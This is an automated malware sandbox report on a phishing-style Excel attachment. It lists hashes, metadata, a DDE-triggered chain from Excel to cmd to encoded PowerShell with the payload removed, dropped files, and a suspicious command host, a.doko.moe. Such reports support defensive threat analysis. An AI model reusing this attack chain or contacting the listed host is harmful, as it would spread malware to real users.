Field | Value |
---|---|
File name | Purchase_Order_list#.xls |
Full analysis | https://app.any.run/tasks/c94cc6e7-f4d4-4dbb-9ead-d88301e2e257 |
Verdict | Malicious activity |
Analysis date | November 15, 2018, 07:36:35 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/vnd.ms-excel |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Nov 14 22:33:34 2018, Last Saved Time/Date: Wed Nov 14 22:33:36 2018, Security: 0 |
MD5 | 281DAE219385648EEBC7E1DB76834738 |
SHA1 | 5AE120368CF74707210A5C9FBA87BF5AC427D0F8 |
SHA256 | 30D3AE38737FE31503073A8B60659366397A5F0DBCF4F53D8E4A439D3F9E9265 |
SSDEEP | 1536:qDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAQM25tTy3XDyFTnSVuGbUz/fp0f057m:qDZ+RwPONXoRjDhIcp0fDlaGGx+cL26p |
Extension | Detected type |
---|---|
.xls | Microsoft Excel sheet (48) |
.xls | Microsoft Excel sheet (alternate) (39.2) |
Property | Value |
---|---|
Author | PC |
LastModifiedBy | PC |
Software | Microsoft Excel |
CreateDate | 2018:11:14 22:33:34 |
ModifyDate | 2018:11:14 22:33:36 |
Security | None |
CodePage | Windows Latin 1 (Western European) |
Company | - |
AppVersion | 12 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | |
HeadingPairs | |
CompObjUserTypeLen | 38 |
CompObjUserType | Microsoft Office Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
---|---|---|---|---|---|---|---|---|---|---|
3956 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 4294967295 | 14.0.6024.1000 |
1404 | cMD & /C PowErSHeLl -En <encoded command removed> | C:\Windows\system32\cMD.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2056 | PowErSHeLl -En <encoded command removed> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cMD.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3956 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA479.tmp.cvr | — | — | — |
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O40BJPTKACEO1WG2M8AR.temp | — | — | — |
3956 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFC098B390FFCC7749.TMP | — | — | — |
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | DA6C793FB0533AF0139A6D76C9956547 | BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D |
3956 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFBEF3AEABE3344CC1.TMP | document | 1525EFA824B3C2C0DBB38B987B588B6C | 5B871CA4529A2B0AF092761348CAC6CA4065549CB56A537A0EBBEDA0B94790BE |
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 3C6A7AAE234382390B6B52F47ECA1BAA | C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dab2f.TMP | binary | 3C6A7AAE234382390B6B52F47ECA1BAA | C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2056 | powershell.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe | | unknown |